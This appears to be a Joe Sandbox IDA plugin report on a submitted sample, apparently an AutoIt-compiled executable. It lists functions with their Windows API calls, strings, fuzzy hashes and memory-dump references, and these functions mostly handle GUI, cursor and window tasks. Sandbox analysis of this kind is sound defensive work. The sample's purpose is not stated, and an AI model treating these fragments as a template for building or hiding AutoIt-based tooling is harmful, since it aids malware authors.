Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: ee5dd334506874f87c0da2072467438e8221a81076346950fe974de8d9e462f1
Instruction ID: ba24f46e8b3bcead56587ed6dcc3efab4984ff558e8be5d486d4a7aa7d413736
Opcode Fuzzy Hash: ee5dd334506874f87c0da2072467438e8221a81076346950fe974de8d9e462f1
Instruction Fuzzy Hash: 8581EBB0700605EADF10AB60DC46FBF3768EF16750F044029FD0A6A196EB7DED45C662

Function 007C89D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007C8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C8AD2
CharNextW.USER32(0000014E), ref: 007C8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007C8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007C8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007C8B86
SetWindowTextW.USER32(?,0000014E), ref: 007C8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007C8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 007C8C1F
_memset.LIBCMT ref: 007C8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007C8C8D
_memset.LIBCMT ref: 007C8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 007C8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 007C8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 007C8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 007C8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007C8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007C8EB4
DrawMenuBar.USER32(?), ref: 007C8EC3
SetWindowTextW.USER32(?,0000014E), ref: 007C8EEB

Strings

0, xrefs: 007C8E55
@U=u, xrefs: 007C8AC1, 007C8AD2, 007C8B07, 007C8B86, 007C8BEE, 007C8C1F, 007C8C8D, 007C8D16, 007C8D6E, 007C8E1B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$@U=u
API String ID: 1073566785-975001249
Opcode ID: a6bfb41ec161b9f1a36a0b5a9febf9ef6242723e7aa03699a52ccaeee5659fb2
Instruction ID: 9fd3e25dd231aea0db6da155eddf4549fb60639ddf1596903625d3a2d8dc0a74
Opcode Fuzzy Hash: a6bfb41ec161b9f1a36a0b5a9febf9ef6242723e7aa03699a52ccaeee5659fb2
Instruction Fuzzy Hash: 5EE16F70900218EBDF619F60CC88FEE7BB9EF05710F14815EF925AA291DB788981DF61

Function 007C488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007C49CA
GetDesktopWindow.USER32 ref: 007C49DF
GetWindowRect.USER32(00000000), ref: 007C49E6
GetWindowLongW.USER32(?,000000F0), ref: 007C4A48
DestroyWindow.USER32(?), ref: 007C4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007C4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 007C4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007C4B09
IsWindowVisible.USER32(?), ref: 007C4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007C4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007C4B58
GetWindowRect.USER32(?,?), ref: 007C4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 007C4B96
GetMonitorInfoW.USER32(00000000,?), ref: 007C4BB0
CopyRect.USER32(?,?), ref: 007C4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 007C4C32

Strings

0, xrefs: 007C4975
tooltips_class32, xrefs: 007C4A96
(, xrefs: 007C4BA3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c322f3a50e6842a17c97eec88399777f5b604073fa240bb3f9b0be961487156b
Instruction ID: d0f1639a3378ccf5c4285e372f504fb187c472a79481f8211d6affaeddfff848
Opcode Fuzzy Hash: c322f3a50e6842a17c97eec88399777f5b604073fa240bb3f9b0be961487156b
Instruction Fuzzy Hash: FBB15771604340AFDB14DF64C898F6ABBE5BB88310F00891CF999AB2A1D779EC05CB95

Function 007427D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007428BC
GetSystemMetrics.USER32(00000007), ref: 007428C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007428EF
GetSystemMetrics.USER32(00000008), ref: 007428F7
GetSystemMetrics.USER32(00000004), ref: 0074291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00742939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00742949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0074297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00742990
GetClientRect.USER32(00000000,000000FF), ref: 007429AE
GetStockObject.GDI32(00000011), ref: 007429CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 007429D5

Part of subcall function 00742344: GetCursorPos.USER32(?), ref: 00742357
Part of subcall function 00742344: ScreenToClient.USER32(008057B0,?), ref: 00742374
Part of subcall function 00742344: GetAsyncKeyState.USER32(00000001), ref: 00742399
Part of subcall function 00742344: GetAsyncKeyState.USER32(00000002), ref: 007423A7

SetTimer.USER32(00000000,00000000,00000028,00741256), ref: 007429FC

Strings

@U=u, xrefs: 007429D5
AutoIt v3 GUI, xrefs: 00742974

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: d49cd86c6b7f46037c2562e88a02cf4211e3f56a0fea503d22fcb4b6911b80df
Instruction ID: a07255558b8f6b0ea3e4d2775bf7deebd722753c172b1026b8fb3a887cb142c7
Opcode Fuzzy Hash: d49cd86c6b7f46037c2562e88a02cf4211e3f56a0fea503d22fcb4b6911b80df
Instruction Fuzzy Hash: 59B15D7160020AEFDB15DFA8DC49BAE7BB5FB08310F508129FA15E6291DB78A851CF64

Function 007A449A Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 007A4500
_wcscmp.LIBCMT ref: 007A450B
_wcscat.LIBCMT ref: 007A4521
_wcsstr.LIBCMT ref: 007A452C
75381560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007A4548
_wcscat.LIBCMT ref: 007A4591
_wcscat.LIBCMT ref: 007A4598
_wcsncpy.LIBCMT ref: 007A45C3

Strings

\VarFileInfo\Translation, xrefs: 007A4540
StringFileInfo\, xrefs: 007A451B
DefaultLangCodepage, xrefs: 007A45AB
04090000, xrefs: 007A457E
%u.%u.%u.%u, xrefs: 007A4626

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcscat$75381560_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 2056390432-1459072770
Opcode ID: 1399610395e3f29c05cfa7b561b7025537d35b86abeb30b18e17d7e10bd9b0e8
Instruction ID: d97245acabbdb5c5b91106b5c7f1e4248e5d13a1ef30af78d14ed6d801ef4bd6
Opcode Fuzzy Hash: 1399610395e3f29c05cfa7b561b7025537d35b86abeb30b18e17d7e10bd9b0e8
Instruction Fuzzy Hash: 5641FA71A00204BBDB10AB74CC4BEBF776CDF82710F04456AFD06E6183EB7E9A1196A5

Function 007CBA33 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 007CBA56
GetFileSize.KERNEL32(00000000,00000000), ref: 007CBA6D
GlobalAlloc.KERNEL32(00000002,00000000), ref: 007CBA78
CloseHandle.KERNEL32(00000000), ref: 007CBA85
GlobalLock.KERNEL32(00000000), ref: 007CBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007CBA9D
GlobalUnlock.KERNEL32(00000000), ref: 007CBAA6
CloseHandle.KERNEL32(00000000), ref: 007CBAAD
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007CBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,007D2CAC,?), ref: 007CBAD7
GlobalFree.KERNEL32(00000000), ref: 007CBAE7
GetObjectW.GDI32(?,00000018,000000FF), ref: 007CBB0B
CopyImage.USER32(?,00000000,?,?,00002000), ref: 007CBB36
DeleteObject.GDI32(00000000), ref: 007CBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007CBB74

Strings

@U=u, xrefs: 007CBB74

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID: @U=u
API String ID: 3840717409-2594219639
Opcode ID: b27e3f2a26203f0c42eb2b56d6cb0fb1456cc19ad7b5bed41e8838ac197502fa
Instruction ID: 7273d83e2abd037fb3ff286051f2e92f4891c40c2f8bc05540e828c04fe23fe8
Opcode Fuzzy Hash: b27e3f2a26203f0c42eb2b56d6cb0fb1456cc19ad7b5bed41e8838ac197502fa
Instruction Fuzzy Hash: 014115B5600208EFDB119F65DC89EAEBBB9FB89711F10806DF909D7260D7389E01CB64

Function 0079A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0079A47A
__swprintf.LIBCMT ref: 0079A51B
_wcscmp.LIBCMT ref: 0079A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0079A583
_wcscmp.LIBCMT ref: 0079A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0079A5F6
GetDlgCtrlID.USER32(?), ref: 0079A648
GetWindowRect.USER32(?,?), ref: 0079A67E
GetParent.USER32(?), ref: 0079A69C
ScreenToClient.USER32(00000000), ref: 0079A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0079A71D
_wcscmp.LIBCMT ref: 0079A731
GetWindowTextW.USER32(?,?,00000400), ref: 0079A757
_wcscmp.LIBCMT ref: 0079A76B

Part of subcall function 0076362C: _iswctype.LIBCMT ref: 00763634

Strings

%s%u, xrefs: 0079A515

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 1d82abc8a4aa6942a41dcf6d0514362296cc5f313f6133f6e36255221d1ef818
Instruction ID: b6af48a923f2792b089241783580cc05f4e4dd115a96f827ba21cdacd0debdcc
Opcode Fuzzy Hash: 1d82abc8a4aa6942a41dcf6d0514362296cc5f313f6133f6e36255221d1ef818
Instruction Fuzzy Hash: D0A1CE31205206FBDB14DF64D889FAAB7E8FF44314F108629F99AD2190DB38E955CBD2

Function 0079AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0079AF18
_wcscmp.LIBCMT ref: 0079AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0079AF51
CharUpperBuffW.USER32(?,00000000), ref: 0079AF6E
_wcscmp.LIBCMT ref: 0079AF8C
_wcsstr.LIBCMT ref: 0079AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0079AFD5
_wcscmp.LIBCMT ref: 0079AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0079B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0079B055
_wcscmp.LIBCMT ref: 0079B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0079B08D
GetWindowRect.USER32(00000004,?), ref: 0079B0F6

Strings

@, xrefs: 0079AEF9
ThumbnailClass, xrefs: 0079AFE0, 0079B060

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 19d20348310b744e2d3591e59b2e3890724cc79e13c658c27c67b45bc2aec877
Instruction ID: e37ad7079e9786651ba9c544c7738933a23dc8694dfdcbd032e7a30d6a76c671
Opcode Fuzzy Hash: 19d20348310b744e2d3591e59b2e3890724cc79e13c658c27c67b45bc2aec877
Instruction Fuzzy Hash: 0281B071108209EFDF04DF14E985FAA7BE9EF44714F04846AFD899A092DB38DD49CBA1

Function 007CA1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007CA259
DestroyWindow.USER32(?,?), ref: 007CA2D3

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007CA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007CA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CA382
DestroyWindow.USER32(00000000), ref: 007CA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00740000,00000000), ref: 007CA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CA3F4
GetDesktopWindow.USER32 ref: 007CA40D
GetWindowRect.USER32(00000000), ref: 007CA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007CA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007CA444

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

Strings

tooltips_class32, xrefs: 007CA346, 007CA3D4
@U=u, xrefs: 007CA36F, 007CA382, 007CA3F4, 007CA41E
0, xrefs: 007CA26F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$@U=u$tooltips_class32
API String ID: 1297703922-1130792468
Opcode ID: c5550667f369923d09400e6ed88a929bac3eb2f3b3b4fe19f35a147aa50da2c0
Instruction ID: 77e7dbae827134908a28674a91bada65102679bb29e2c5adacf8302bc1eaa145
Opcode Fuzzy Hash: c5550667f369923d09400e6ed88a929bac3eb2f3b3b4fe19f35a147aa50da2c0
Instruction Fuzzy Hash: B771AF70140249AFDB25CF28CC49F6B7BE6FB88305F04852DF985972A1D778E906CB66

Function 0079ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0079AC33

Strings

REGEXP=, xrefs: 0079AC48
[ACTIVE, xrefs: 0079AC20
ACTIVE, xrefs: 0079AC0E
HANDLE=, xrefs: 0079AC2C
[LAST, xrefs: 0079ACE0
[CLASS:, xrefs: 0079AC83
CLASSNAME=, xrefs: 0079AC70
[REGEXPTITLE:, xrefs: 0079AC5B
ALL, xrefs: 0079ACC7
LAST, xrefs: 0079ABF8
[HANDLE:, xrefs: 0079AC3F
[ALL, xrefs: 0079ACD9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: bf692ca6dbbd7b02374912ea09df4176abbac22a5ae3426f4764b824d4e8abcd
Instruction ID: 05e3e233d9b15633f16d5e4e59257c5ea65b70601d9d3a8834308b7757fd8443
Opcode Fuzzy Hash: bf692ca6dbbd7b02374912ea09df4176abbac22a5ae3426f4764b824d4e8abcd
Instruction Fuzzy Hash: 6131C470648209FBDB08EA64ED4BEBE7764AF10710F604428F902751D2EF5D6F14C6A2

Function 007B4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 007B5013
LoadCursorW.USER32(00000000,00007F00), ref: 007B501E
LoadCursorW.USER32(00000000,00007F03), ref: 007B5029
LoadCursorW.USER32(00000000,00007F8B), ref: 007B5034
LoadCursorW.USER32(00000000,00007F01), ref: 007B503F
LoadCursorW.USER32(00000000,00007F81), ref: 007B504A
LoadCursorW.USER32(00000000,00007F88), ref: 007B5055
LoadCursorW.USER32(00000000,00007F80), ref: 007B5060
LoadCursorW.USER32(00000000,00007F86), ref: 007B506B
LoadCursorW.USER32(00000000,00007F83), ref: 007B5076
LoadCursorW.USER32(00000000,00007F85), ref: 007B5081
LoadCursorW.USER32(00000000,00007F82), ref: 007B508C
LoadCursorW.USER32(00000000,00007F84), ref: 007B5097
LoadCursorW.USER32(00000000,00007F04), ref: 007B50A2
LoadCursorW.USER32(00000000,00007F02), ref: 007B50AD
LoadCursorW.USER32(00000000,00007F89), ref: 007B50B8
GetCursorInfo.USER32(?), ref: 007B50C8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 92e8425945d1ba4cbe4d4aa99f87b01a4a129995959d09181974d0c0ce200e4b
Instruction ID: e26caa1919b8611cd312426e1b1366be4501c0bd915cd76310a50e040a6f4243
Opcode Fuzzy Hash: 92e8425945d1ba4cbe4d4aa99f87b01a4a129995959d09181974d0c0ce200e4b
Instruction Fuzzy Hash: EF31B3B1D4831DAADB109FB68C8999FBFE8FF04750F50452AE50DE7280DA7865008E95

Function 007C4392 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007C4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C446F

Strings

SELECT, xrefs: 007C4620
ISCHECKED, xrefs: 007C45F2
CHECK, xrefs: 007C448F
COLLAPSE, xrefs: 007C44B5
EXISTS, xrefs: 007C44D8
GETTOTALCOUNT, xrefs: 007C4456
@U=u, xrefs: 007C446F
GETSELECTED, xrefs: 007C457F
GETITEMCOUNT, xrefs: 007C4551
UNCHECK, xrefs: 007C464B
EXPAND, xrefs: 007C4521
GETTEXT, xrefs: 007C45C2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
